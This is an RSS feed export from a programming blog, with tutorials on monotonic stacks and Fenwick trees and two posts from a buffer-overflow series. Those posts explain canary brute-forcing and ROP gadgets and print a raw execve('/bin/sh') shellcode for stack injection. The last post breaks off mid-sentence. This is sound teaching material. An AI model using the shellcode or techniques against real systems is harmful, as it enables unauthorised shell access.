<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[The Aspires]]></title><description><![CDATA[the Aspires Web Blog]]></description><link>https://www.aspires.cc/</link><image><url>https://www.aspires.cc/favicon.png</url><title>The Aspires</title><link>https://www.aspires.cc/</link></image><generator>Ghost 5.82</generator><lastBuildDate>Sun, 19 Apr 2026 20:29:09 GMT</lastBuildDate><atom:link href="https://www.aspires.cc/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[An Introduction to Monotonic Stack]]></title><description><![CDATA[A Monotonic Stack is a stack where elements are maintained in a specific order: ascending, descending, or based on user-defined properties. This structure saves time on comparisons and improves algorithm efficiency.]]></description><link>https://www.aspires.cc/mono-stack/</link><guid isPermaLink="false">666b4d7a90278b0001b1e1f9</guid><category><![CDATA[Algorithms]]></category><dc:creator><![CDATA[Ex10si0n Yan]]></dc:creator><pubDate>Thu, 13 Jun 2024 20:58:11 GMT</pubDate><media:content url="https://www.aspires.cc/content/images/2024/06/mono-stack.png" medium="image"/><content:encoded><![CDATA[<img src="https://www.aspires.cc/content/images/2024/06/mono-stack.png" alt="An Introduction to Monotonic Stack"><p>A Monotonic Stack, as its name suggests, is a stack where all elements are maintained in a specific order: either ascending, descending, or based on user-defined comparable properties. The characteristic of this data structure is the maintenance of this order, which can save time on certain types of comparisons and improve the efficiency of some algorithms.</p><h1 id="an-example">An Example</h1><p>Given an array to be pushed into a monotonic descending stack, say this array is <code>[5, 3, 1, 7, 6, 2]</code>. The first three elements pushed into the stack are:</p><pre><code>[buttom -&gt; top
[5
[5 3
[5 3 1</code></pre><p>And for the next one, 7, which is greater than the top of the stack (1), the stack will be popped until it meets one of the following conditions:</p><ul><li>Stack is empty</li><li>Stack top is greater than the next element (7)</li></ul><p>So the stack will iteratively be:</p><pre><code>[5 3 1
[5 3
[5
[
[7      
</code></pre><p>And then 6 is smaller than the top of the stack, so push it. So do the final element 2.</p><pre><code>[7 6
[7 6 2</code></pre><p>The property of this data structure is that <strong>the top of the stack must be the extremum value (either maximum or minimum)</strong></p><h1 id="solving-problems">Solving Problems</h1><p>Here are some problems that you can solve using a monotonic stack. I will explain one of them, the <em>Bad Hair Day</em>. The second one, <em>Trapping Rain Water</em>, is an exercise for you.</p><h2 id="poj-3250-bad-hair-day">POJ 3250 Bad Hair Day</h2><p>One of the examples is <em>&quot;Bad Hair Day&quot;</em> from <a href="http://poj.org/searchproblem?field=source&amp;key=USACO+2006+November+Silver&amp;ref=aspires.cc">USACO 2006 November Silver</a> (this link will redirect you to POJ.org).</p><p></p><div class="kg-card kg-toggle-card" data-kg-toggle-state="close">
            <div class="kg-toggle-heading">
                <h4 class="kg-toggle-heading-text"><span style="white-space: pre-wrap;">POJ 3250 Bad Hair Day Description</span></h4>
                <button class="kg-toggle-card-icon" aria-label="Expand toggle to read content">
                    <svg id="Regular" xmlns="http://www.w3.org/2000/svg" viewbox="0 0 24 24">
                        <path class="cls-1" d="M23.25,7.311,12.53,18.03a.749.749,0,0,1-1.06,0L.75,7.311"/>
                    </svg>
                </button>
            </div>
            <div class="kg-toggle-content"><p><span style="white-space: pre-wrap;">$N$ cows standing from left to right, $h_i$ is the height of cow $i$. $c_i$ is the number of cows between cow $i$ and the first cow standing on the right of and taller than cow $i$. Determine the value of $\sum\limits_{i=1}^{N} c_i$.</span></p></div>
        </div><p>To solve this problem, we can use a monotonic descending stack, accumulating the answer each time the stack pops. Say we have <code>height = [10, 3, 7, 4, 12, 2]</code> represents the height of each cow. After push two <strong>indices</strong> (not element) into the stack,</p><pre><code>[0
[0 1</code></pre><p>we meet a cow 3 (height of 7) which is greater than the top of stack, which means, the stack top cow 1 (height of 3) can see 0 (index of cow in height of 7 - index of the stack top - 1) cow. So we accumulate this value to answer (<code>ans += 0</code>), pop cow 1 (height of 3) until an empty stack or the stack top cow is taller than 7, and push cow 2 (height of 7). After that,</p><pre><code>[0        ans += (i - stack.top() - 1), stack.pop()
[0 2
[0 2 3</code></pre><p>When we meet cow 4 (height of 12), another cow that higher than the stack top cow 3 (height of 4). Cow 3 then can see 0 cow, cow 2 (height of 7) can see 1 cow, and cow 0 (height of 10) can see 3 cows. Let&apos;s break it up,</p><pre><code>i = 4   # current cow index
top_idx = 3   # top index
c_3 = i - 3 - 1 = 0, then stack.pop(), ans += c_3, top_idx = 2
c_2 = i - 2 - 1 = 1, then stack.pop(), ans += c_2, top_idx = 0
c_0 = i - 0 - 1 = 3, then stack.pop(), ans += c_0, stack empty</code></pre><p>Then push cow 4 and cow 5 (height of 12 and 2) into the stack,</p><pre><code>[4
[4 5</code></pre><p>When we reach the right-most cow, we push a cow that has infinite height, then we can calculate the number of cows that cow 4 and cow 5 can see.</p><pre><code>i = 6
top_idx = 4
c_4 = i - 4 - 1, then stack.pop(), ans += c_4, top_idx = 5
c_5 = i - 5 - 1, then stack.pop(), ans += c_5, stack empty</code></pre><p>Then push the infinite height cow into the stack (optional) as we return the final answer.</p><p>The code is shown in the following code block:</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/9b96aed01e5f326a1b2c0ce8ee6e5674.js"></script>
<!--kg-card-end: html-->
<h2 id="leetcode-42-trapping-rain-water">LeetCode 42 Trapping Rain Water</h2><p>Another problem is <a href="https://leetcode.com/problems/trapping-rain-water/description?ref=aspires.cc" rel="noreferrer">LeetCode 42</a>. You can try solving this problem yourself. The solution code is provided on GitHub Gist, so feel free to explore it.</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://gist.github.com/Ex10si0n/2db075be24bd9e7c8b0e4ec91371021c?ref=aspires.cc"><div class="kg-bookmark-content"><div class="kg-bookmark-title">trap.py</div><div class="kg-bookmark-description">GitHub Gist: instantly share code, notes, and snippets.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.githubassets.com/assets/pinned-octocat-093da3e6fa40.svg" alt="An Introduction to Monotonic Stack"><span class="kg-bookmark-author">Gist</span><span class="kg-bookmark-publisher">262588213843476</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://github.githubassets.com/assets/gist-og-image-54fd7dc0713e.png" alt="An Introduction to Monotonic Stack"></div></a></figure>]]></content:encoded></item><item><title><![CDATA[Buffer Overflow Attack from the Ground-up III: Canary]]></title><description><![CDATA[To combat buffer overflow attack, the “canary” stands out as a notable and effective strategy. Canary serves as an early warning system. It is a small, yet crucial, element placed in the stack memory of a program to detect and prevent buffer overflow attacks.]]></description><link>https://www.aspires.cc/buffer-overflow-3/</link><guid isPermaLink="false">6668a13e90278b0001b1e180</guid><category><![CDATA[Security]]></category><dc:creator><![CDATA[Ex10si0n Yan]]></dc:creator><pubDate>Wed, 12 Jun 2024 17:56:22 GMT</pubDate><media:content url="https://www.aspires.cc/content/images/2024/06/buffer-overflow-canary.png" medium="image"/><content:encoded><![CDATA[<img src="https://www.aspires.cc/content/images/2024/06/buffer-overflow-canary.png" alt="Buffer Overflow Attack from the Ground-up III: Canary"><p>In previous sections, we learned about buffer overflow attacks and the methods of injecting shell code. This post will introduce a simple protection mechanism against these attacks, as well as ways to bypass some specific canary protections.</p><h1 id="canary">Canary</h1><p>A canary is a bit or some bits placed in the memory before the return address. If the canary has been modified, the program crashes rather than executing the following instructions. This acts as an integrity check to defend against buffer overflow attacks.</p><figure class="kg-card kg-image-card"><img src="https://www.aspires.cc/content/images/2024/06/canary-changed.png" class="kg-image" alt="Buffer Overflow Attack from the Ground-up III: Canary" loading="lazy" width="2000" height="661" srcset="https://www.aspires.cc/content/images/size/w600/2024/06/canary-changed.png 600w, https://www.aspires.cc/content/images/size/w1000/2024/06/canary-changed.png 1000w, https://www.aspires.cc/content/images/size/w1600/2024/06/canary-changed.png 1600w, https://www.aspires.cc/content/images/2024/06/canary-changed.png 2000w" sizes="(min-width: 720px) 720px"></figure><h1 id="by-passing-the-canary">By-passing the Canary</h1><p>In a buffer overflow attack, the philosophy is to change the memory content (especially the return address) by inputting well-constructed inputs. However, if the canary is fixed each time, it can be easily bypassed because an attacker can brute-force the canary bit by bit.</p><p>Say the canary is <code>c4n4</code>, at the position staring at the 129th bit after the buffer input point.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://www.aspires.cc/content/images/2024/06/canary-brute-force.png" class="kg-image" alt="Buffer Overflow Attack from the Ground-up III: Canary" loading="lazy" width="2000" height="834" srcset="https://www.aspires.cc/content/images/size/w600/2024/06/canary-brute-force.png 600w, https://www.aspires.cc/content/images/size/w1000/2024/06/canary-brute-force.png 1000w, https://www.aspires.cc/content/images/size/w1600/2024/06/canary-brute-force.png 1600w, https://www.aspires.cc/content/images/2024/06/canary-brute-force.png 2000w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Brute Force Canary</span></figcaption></figure><p>We can construct an input of 129 bytes, where the last byte loops from ASCII 0 to 255. Since we did not modify the 130th, 131st, and 132nd bytes, there must be a value in the loop that does not make the program crash. This value is &#x2018;c&#x2019;, and from this, we know that the 129th byte is &#x2018;c&#x2019;.</p><figure class="kg-card kg-image-card kg-width-wide"><img src="https://www.aspires.cc/content/images/2024/06/canary-brute-force-1.png" class="kg-image" alt="Buffer Overflow Attack from the Ground-up III: Canary" loading="lazy" width="2000" height="533" srcset="https://www.aspires.cc/content/images/size/w600/2024/06/canary-brute-force-1.png 600w, https://www.aspires.cc/content/images/size/w1000/2024/06/canary-brute-force-1.png 1000w, https://www.aspires.cc/content/images/size/w1600/2024/06/canary-brute-force-1.png 1600w, https://www.aspires.cc/content/images/2024/06/canary-brute-force-1.png 2000w" sizes="(min-width: 1200px) 1200px"></figure><p>The logic is, the program will not crash once in each loop, then we can get each bits of the canary.</p><figure class="kg-card kg-image-card kg-width-wide"><img src="https://www.aspires.cc/content/images/2024/06/canary-brute-force-2-1.png" class="kg-image" alt="Buffer Overflow Attack from the Ground-up III: Canary" loading="lazy" width="2000" height="552" srcset="https://www.aspires.cc/content/images/size/w600/2024/06/canary-brute-force-2-1.png 600w, https://www.aspires.cc/content/images/size/w1000/2024/06/canary-brute-force-2-1.png 1000w, https://www.aspires.cc/content/images/size/w1600/2024/06/canary-brute-force-2-1.png 1600w, https://www.aspires.cc/content/images/2024/06/canary-brute-force-2-1.png 2254w" sizes="(min-width: 1200px) 1200px"></figure><p>Once we obtain the canary value, we can easily change the return address without altering the canary. Since we already know the canary value, it can be included in the input string.</p><p>The following diagram illustrates this action, after we crack the canary, we can change the return address.</p><figure class="kg-card kg-image-card"><img src="https://www.aspires.cc/content/images/2024/06/stack.png" class="kg-image" alt="Buffer Overflow Attack from the Ground-up III: Canary" loading="lazy" width="1342" height="842" srcset="https://www.aspires.cc/content/images/size/w600/2024/06/stack.png 600w, https://www.aspires.cc/content/images/size/w1000/2024/06/stack.png 1000w, https://www.aspires.cc/content/images/2024/06/stack.png 1342w" sizes="(min-width: 720px) 720px"></figure><p>The example code is shown in the following code block, the code tries to discover the canary byte by byte. For each byte position, it iterates through all possible byte values (0-255) until it finds the correct one that does not cause the program to crash, indicating the correct canary byte. </p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/2fdc41f9b42308408d1d10b4f8ba038e.js"></script>
<!--kg-card-end: html-->
<h1 id="more-readings">More Readings</h1><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://www.aspires.cc/buffer-overflow-1/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Buffer Overflow Attack from the Ground-up I: Simple Overflow</div><div class="kg-bookmark-description">Buffer overflow is a security flaw where data exceeds a buffer&#x2019;s capacity, spilling into neighboring memory. This overflow can corrupt crucial data, causing system instability or even enabling attackers to hijack control.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://www.aspires.cc/content/images/size/w256h256/2024/06/aspire-mono-margin.png" alt="Buffer Overflow Attack from the Ground-up III: Canary"><span class="kg-bookmark-author">The Aspires</span><span class="kg-bookmark-publisher">Ex10si0n Yan</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://www.aspires.cc/content/images/2024/06/buffer-overflow-1.png" alt="Buffer Overflow Attack from the Ground-up III: Canary"></div></a></figure><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://www.aspires.cc/buffer-overflow-2/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Buffer Overflow Attack from the Ground-up II: Gadget and Shell Code Injection</div><div class="kg-bookmark-description">The previous post introduced the heap, stack, and buffer overflow on the stack using disassembly and GDB. In &#x2018;Buffer Overflow Attack from the Ground-Up II,&#x2019; I will show how to hijack the shell and control the system through the vulnerable program.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://www.aspires.cc/content/images/size/w256h256/2024/06/aspire-mono-margin.png" alt="Buffer Overflow Attack from the Ground-up III: Canary"><span class="kg-bookmark-author">The Aspires</span><span class="kg-bookmark-publisher">Ex10si0n Yan</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://www.aspires.cc/content/images/2024/06/buffer-overflow-gadget-1.png" alt="Buffer Overflow Attack from the Ground-up III: Canary"></div></a></figure>]]></content:encoded></item><item><title><![CDATA[Binary Indexed Tree: A Data Structure that Can Enhance Query Performance in Arrays]]></title><description><![CDATA[Many years ago, I was a beginner in the Olympiad of Informatics. My friend @PremierBob taught me an incredible data structure that impressed me greatly: the Binary Indexed Tree, also known as the Fenwick Tree. It was a sunny afternoon at my high school.]]></description><link>https://www.aspires.cc/binary-indexed-tree/</link><guid isPermaLink="false">665f6e96f0e29a000109dfdb</guid><category><![CDATA[Algorithms]]></category><dc:creator><![CDATA[Ex10si0n Yan]]></dc:creator><pubDate>Tue, 04 Jun 2024 23:18:41 GMT</pubDate><media:content url="https://www.aspires.cc/content/images/2024/06/bit.png" medium="image"/><content:encoded><![CDATA[<img src="https://www.aspires.cc/content/images/2024/06/bit.png" alt="Binary Indexed Tree: A Data Structure that Can Enhance Query Performance in Arrays"><p>Many years ago, I was a beginner in the Olympiad of Informatics. My friend @PremierBob taught me an incredible data structure that impressed me greatly: the Binary Indexed Tree, also known as the Fenwick Tree. It was a sunny afternoon at my high school.</p><p>He noticed that I was quite bored, so he decided to come over and talk to me about algorithms. We were both preparing for the OI, so I appreciated.</p><p>He said, &#x201C;If there is an array and I want to query the sum of a specific range, how would you do that?&#x201D;</p><p>&#x201C;A for loop,&#x201D; the thought came to my mind. But he didn&#x2019;t expect such a simple answer, apparently. &#x201C;While you are definitely expecting a smarter way to do this, I&#x2019;d rather know your approach,&#x201D; I responded.</p><p>He started to introduce how integers are stored in a computer. </p><h1 id="an-integer-in-memory">An Integer in Memory</h1><p>The way of storing a positive integer in a computer is very straightforward. It is binary. Consider the number 42; its binary representation is <code>101010</code>. Mathematically defined. Representing a negative integer is also very simple: just take the 2&#x2019;s complement of the positive number. For example, -42.</p><pre><code>42                   : 00101010
1&apos;s complement       : 11010101
2&apos;s complement (-42) : 11010110</code></pre><p>&#x201C;So the 1&#x2019;s complement is just bit-wise NOT, and 2&#x2019;s complement is the 1&#x2019;s complement plus one?&#x201D; I asked.</p><p>&#x201C;Definitely!&#x201D; he said.</p><p>&#x201C;Wait a sec,&#x201D; I was so confused. &#x201C;What does this have to do with a range sum query of an array?&#x201D;</p><p>&#x201C;Binary itself is the key to this approach. Let&#x2019;s say the numbers from 1 to 16 are the index of an array, agreed?&#x201D; he continued. &#x201C;Just forget about 0 for now. If we just want the rightmost 1 (RM1) for these 16 numbers, what will that be?&#x201D;</p><pre><code>i: bin     RM1
1  0000001 0000001
2  0000010 0000010
3  0000011 0000001
4  0000100 0000100
5  0000101 0000001
6  0000110 0000010
7  0000111 0000001
8  0001000 0001000
9  0001001 0000001
10 0001010 0000010
11 0001011 0000001
12 0001100 0000100
13 0001101 0000001
14 0001110 0000010
15 0001111 0000001
16 0010000 0010000</code></pre><p>&#x201C;It is rarer to find the rightmost 1 on the higher digit than on the lower digit,&#x201D; I responded. &#x201C;And I know that the way of finding the rightmost 1 is bitwise AND for a number x with its negative value (-x).&#x201D;</p><p></p><div class="kg-card kg-toggle-card" data-kg-toggle-state="close">
            <div class="kg-toggle-heading">
                <h4 class="kg-toggle-heading-text"><span style="white-space: pre-wrap;">Find the Right Most 1 in a Binary</span></h4>
                <button class="kg-toggle-card-icon" aria-label="Expand toggle to read content">
                    <svg id="Regular" xmlns="http://www.w3.org/2000/svg" viewbox="0 0 24 24">
                        <path class="cls-1" d="M23.25,7.311,12.53,18.03a.749.749,0,0,1-1.06,0L.75,7.311"/>
                    </svg>
                </button>
            </div>
            <div class="kg-toggle-content"><p><span style="white-space: pre-wrap;">Simply calculate </span><code spellcheck="false" style="white-space: pre-wrap;"><span>rm1 = x &amp; -x</span></code><span style="white-space: pre-wrap;"> and you will get that, see </span><a href="https://stackoverflow.com/questions/31393100/how-to-get-position-of-right-most-set-bit-in-c?ref=aspires.cc"><span style="white-space: pre-wrap;">https://stackoverflow.com/questions/31393100/how-to-get-position-of-right-most-set-bit-in-c</span></a></p></div>
        </div><p>&#x201C;That&#x2019;s right, and it also follows some patterns. Let&#x2019;s take a look at the following graph.&#x201D;</p><figure class="kg-card kg-image-card"><img src="https://www.aspires.cc/content/images/2024/06/bit-from-binary.png" class="kg-image" alt="Binary Indexed Tree: A Data Structure that Can Enhance Query Performance in Arrays" loading="lazy" width="2000" height="1076" srcset="https://www.aspires.cc/content/images/size/w600/2024/06/bit-from-binary.png 600w, https://www.aspires.cc/content/images/size/w1000/2024/06/bit-from-binary.png 1000w, https://www.aspires.cc/content/images/size/w1600/2024/06/bit-from-binary.png 1600w, https://www.aspires.cc/content/images/2024/06/bit-from-binary.png 2000w" sizes="(min-width: 720px) 720px"></figure><p>&#x201C;A red box contains the sum of all blue lines that extend from it.&#x201D; he said while drawing, &quot;with the nature of numbers, we can define this rule&quot;</p><p>We named the function of finding the right most 1 as <code>lowbit</code>, the function is defined in code:</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/09e4d01d6e6b76915dd625808c559b56.js"></script>
<!--kg-card-end: html-->
<blockquote>Array <code>c</code> maintains the sum of range such that starting from <strong>x - lowbit(x) + 1 </strong>and end with <strong>x</strong>, inclusively.<br><br>A code snippet to describe this rule is: <code>c[x] = sum(a[x - lowbit(x) + 1, ..., a[x])</code></blockquote><p>The following figure shows an example of maintaining an array <code>a = [1, 2, 7, 6, 3, 5, 4, 1]</code>. The array <code>c = [1, 3, 7, 16, 3, 8, 4, 29]</code> represents sum of each intervals in <code>[[1, 1], [1, 2], [3, 3], [1, 4], [5, 5], [5, 6], [7, 7], [1, 8]]</code>, which is defined as <code>[[x - lowbit(x) + 1, x], ...]</code>.</p><figure class="kg-card kg-image-card"><img src="https://www.aspires.cc/content/images/2024/06/bit-example.png" class="kg-image" alt="Binary Indexed Tree: A Data Structure that Can Enhance Query Performance in Arrays" loading="lazy" width="2000" height="914" srcset="https://www.aspires.cc/content/images/size/w600/2024/06/bit-example.png 600w, https://www.aspires.cc/content/images/size/w1000/2024/06/bit-example.png 1000w, https://www.aspires.cc/content/images/size/w1600/2024/06/bit-example.png 1600w, https://www.aspires.cc/content/images/2024/06/bit-example.png 2000w" sizes="(min-width: 720px) 720px"></figure><p>&#x201C;That is awesome!&#x201D; I said. &#x201C;And you can query the sum of an array by adding these interval sums in c. For example, if I want to calculate the sum of the range [3, 6] inclusive, I just need to determine <code>c[6] + c[4] - c[2]</code>, rather than calculate <code>a[3] + a[4] + a[5] + a[6]</code>. For a more extreme example, if I want to calculate the sum of the range [1, 8], I just use <code>c[8]</code>.&#x201D;</p><p>&#x201C;This approach can lower the time complexity of determining the sum of a range from $O(n)$ to $O(\log n)$. But it&#x2019;s worth mentioning that this approach only supports range arithmetic operations that follow the <strong>associative law</strong>, such as addition (sum), multiplication (cumulative product), and exclusive OR, aka XOR,&#x201D; he added.</p><p>The Python code for getting the sum of an interval starting from 1 and the interval from <code>l</code> to <code>r</code> is:</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/efe64c6178be81928ae2a91a46f4e297.js"></script>
<!--kg-card-end: html-->
<p>To initialize the tree, we need $O(n)$ of time, we can use a <strong>prefix sum array</strong> <code>sum</code>, to help us with the initialization, then you can use the <code>get_sum</code> or <code>get_sum_interval</code> to query range sum.</p><p></p><div class="kg-card kg-toggle-card" data-kg-toggle-state="close">
            <div class="kg-toggle-heading">
                <h4 class="kg-toggle-heading-text"><span style="white-space: pre-wrap;">Prefix Sum Array</span></h4>
                <button class="kg-toggle-card-icon" aria-label="Expand toggle to read content">
                    <svg id="Regular" xmlns="http://www.w3.org/2000/svg" viewbox="0 0 24 24">
                        <path class="cls-1" d="M23.25,7.311,12.53,18.03a.749.749,0,0,1-1.06,0L.75,7.311"/>
                    </svg>
                </button>
            </div>
            <div class="kg-toggle-content"><p dir="ltr"><span style="white-space: pre-wrap;">A Prefix Sum Array, also known as a cumulative sum array or cumulative frequency array, is an array where each element represents the sum of all elements up to that index in the original array.</span></p><p dir="ltr"><span style="white-space: pre-wrap;">For example, given an array </span><code spellcheck="false" style="white-space: pre-wrap;"><span>arr = [1, 3, 5, 7, 9]</span></code><span style="white-space: pre-wrap;">, its prefix sum array would be </span><code spellcheck="false" style="white-space: pre-wrap;"><span>[1, 4, 9, 16, 25]</span></code><span style="white-space: pre-wrap;">.</span></p></div>
        </div><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://www.aspires.cc/prefix-sum/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Time Complexity Optimization: Prefix Sum with HashMap</div><div class="kg-bookmark-description">A very cool way of using Prefix Sum with Hash-map is shown in this post. I am going to break down this LeetCode 560 problem to reveal the idea of lowering down the time complexity by adopting Hash-map (or dictionary in Python).</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://www.aspires.cc/content/images/size/w256h256/2024/06/aspire-mono-margin.png" alt="Binary Indexed Tree: A Data Structure that Can Enhance Query Performance in Arrays"><span class="kg-bookmark-author">The Aspires</span><span class="kg-bookmark-publisher">Ex10si0n Yan</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://www.aspires.cc/content/images/2024/05/prefix-sum-hashmap.png" alt="Binary Indexed Tree: A Data Structure that Can Enhance Query Performance in Arrays"></div></a></figure><p>The code is shown as follow:</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/7d5ce3ecc00dbffd6d14af70b6b5ad46.js"></script>
<!--kg-card-end: html-->
<p>&quot;That&apos;s is clear, and what about updating the value at index i in a, like <code>a[i]</code>?&quot; I asked.</p><p>&quot;I will introduce that to you next time~&quot;.</p>]]></content:encoded></item><item><title><![CDATA[Buffer Overflow Attack from the Ground-up II: Gadget and Shell Code Injection]]></title><description><![CDATA[The previous post introduced the heap, stack, and buffer overflow on the stack using disassembly and GDB. In 'Buffer Overflow Attack from the Ground-Up II,' I will show how to hijack the shell and control the system through the vulnerable program.]]></description><link>https://www.aspires.cc/buffer-overflow-2/</link><guid isPermaLink="false">665e000f83be240001580237</guid><category><![CDATA[Security]]></category><dc:creator><![CDATA[Ex10si0n Yan]]></dc:creator><pubDate>Mon, 03 Jun 2024 18:47:16 GMT</pubDate><media:content url="https://www.aspires.cc/content/images/2024/06/buffer-overflow-gadget-1.png" medium="image"/><content:encoded><![CDATA[<h1 id="gadgets">Gadgets</h1><img src="https://www.aspires.cc/content/images/2024/06/buffer-overflow-gadget-1.png" alt="Buffer Overflow Attack from the Ground-up II: Gadget and Shell Code Injection"><p>A <strong>ransom note</strong> is created by cutting out letters or words from magazines or newspapers and pasting them together to form a message.&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://www.aspires.cc/content/images/2024/06/ransom.webp" class="kg-image" alt="Buffer Overflow Attack from the Ground-up II: Gadget and Shell Code Injection" loading="lazy" width="1820" height="1214" srcset="https://www.aspires.cc/content/images/size/w600/2024/06/ransom.webp 600w, https://www.aspires.cc/content/images/size/w1000/2024/06/ransom.webp 1000w, https://www.aspires.cc/content/images/size/w1600/2024/06/ransom.webp 1600w, https://www.aspires.cc/content/images/2024/06/ransom.webp 1820w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Ransom Note, Image from indieground.net</span></figcaption></figure><p>An assembly <strong>gadget</strong> is quite similar to this technique, a gadget is a small sequence of machine instructions ending with a ret (return) instruction. These gadgets are found in the program&#x2019;s <u>existing code</u> and are used to execute specific operations. Attackers chain multiple gadgets together to perform complex actions, similar to forming a coherent message from cut-out words in a ransom note.</p><p>As an example, a <code>jmp esp</code> gadget can be found in assembly code, such as in <code>&lt;__libc_start_main@plt&gt;</code>, as shown in the following code block.</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/d917c9127c7fb03f5975ed9ec6c6267d.js"></script>
<!--kg-card-end: html-->
<p>By extracting the highlight part, the assembly code can be reformed to be a different instruction.</p>
<!--kg-card-begin: html-->
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <style>
        .highlight-yellow {
            background-color: yellow;
        }
        .highlight-green {
            background-color: lightgreen;
        }
    </style>
</head>
<body>
    <pre>
8049131:       e8 aa ff ff <span class="highlight-yellow">ff</span>   call   80490e0 <__libc_start_main@plt>
8049136:       <span class="highlight-yellow">f4</span>               hlt
8049137:       <span class="highlight-yellow">8b 1c 24</span>         mov    (%esp),%ebx
804913a:       <span class="highlight-yellow">c3</span>               ret</__libc_start_main@plt></pre>
</body>
</html>
<!--kg-card-end: html-->
<p>The reformed instruction (starting from 0x8049135 and ending at 0x804913a) represents</p>
<!--kg-card-begin: html-->
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <style>
        .highlight-yellow {
            background-color: yellow;
        }
        .highlight-green {
            background-color: lightgreen;
        }
    </style>
</head>
<body>
    <pre>
8049135:       ff f4            push   esp
8049137:       8b 1c 24         mov    (%esp),%ebx
804913a:       c3               ret</pre>
</body>
</html>
<!--kg-card-end: html-->
<p>Where, under the 32-bit x86 architecture, <code>push esp</code> pushes the current value of the ESP (Extended Stack Pointer) register onto the stack. While <code>mov (%esp), %ebx</code> is not necessary, and the gadget can finally return to <code>ret</code> address, which is equivalent to <code>jmp esp</code>, meaning the EIP (instruction counter) will go to the current top of the stack and execute the instructions found there.</p><h1 id="shellcode">Shellcode</h1><p>A shellcode is a small piece of code used as the payload to be executed, after execution, a shell can be spawned for the process to interact. The term &#x201C;shellcode&#x201D; comes from its initial purpose of spawning a command shell, but it can be used to perform a variety of tasks, depending on the goals of the attacker.</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/7deccb035da0b7db1c14f68979e4f757.js"></script>
<!--kg-card-end: html-->
<p>The code from previous code block is a shell code, provided by Jean Pascal Pereira. <sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup></p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>Linux x86 execve(&quot;/bin/sh&quot;) - 28 bytes: <a href="http://0xffe4.org/?ref=aspires.cc">http://0xffe4.org</a> <a href="#fnref1" class="footnote-backref">&#x21A9;&#xFE0E;</a></p>
</li>
</ol>
</section>
<p>The assembly binary (inside <code>char shellcode[]</code>) is:</p><pre><code>\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80</code></pre><h1 id="spawn-a-shell">Spawn a Shell</h1><p>That will be very interesting if we can construct an input that overflows the buffer, overwrites the original return address with the gadget (so that the program executes the following instructions at the top of the stack), and places <strong>shellcode</strong> at the top of the stack that will spawn a shell for us, as shown in the following figure.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://www.aspires.cc/content/images/2024/06/bufferoverflow-2-stack-diagram.png" class="kg-image" alt="Buffer Overflow Attack from the Ground-up II: Gadget and Shell Code Injection" loading="lazy" width="1758" height="796" srcset="https://www.aspires.cc/content/images/size/w600/2024/06/bufferoverflow-2-stack-diagram.png 600w, https://www.aspires.cc/content/images/size/w1000/2024/06/bufferoverflow-2-stack-diagram.png 1000w, https://www.aspires.cc/content/images/size/w1600/2024/06/bufferoverflow-2-stack-diagram.png 1600w, https://www.aspires.cc/content/images/2024/06/bufferoverflow-2-stack-diagram.png 1758w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Stack Diagram</span></figcaption></figure><p>That sounds like a good plan. Let&apos;s use GDB to see what happens!</p><figure class="kg-card kg-image-card kg-width-wide kg-card-hascaption"><img src="https://www.aspires.cc/content/images/2024/06/shell-code-exploit.png" class="kg-image" alt="Buffer Overflow Attack from the Ground-up II: Gadget and Shell Code Injection" loading="lazy" width="1912" height="792" srcset="https://www.aspires.cc/content/images/size/w600/2024/06/shell-code-exploit.png 600w, https://www.aspires.cc/content/images/size/w1000/2024/06/shell-code-exploit.png 1000w, https://www.aspires.cc/content/images/size/w1600/2024/06/shell-code-exploit.png 1600w, https://www.aspires.cc/content/images/2024/06/shell-code-exploit.png 1912w" sizes="(min-width: 1200px) 1200px"><figcaption><span style="white-space: pre-wrap;">GDB debugging</span></figcaption></figure><p>The input point is shown in section C, as we inputed <code>10101234</code>, stored at 0xffffd66c (indicated using red &quot;input&quot; and an arrow), and the <code>ret</code> is at 0xffffd70c (in red and blue double-block in section C). Section A shows the gadget and section B shows the original <code>ret</code> value 0x80492d5. </p><p>The shellcode is then inserted by user input right after the return address (yellow 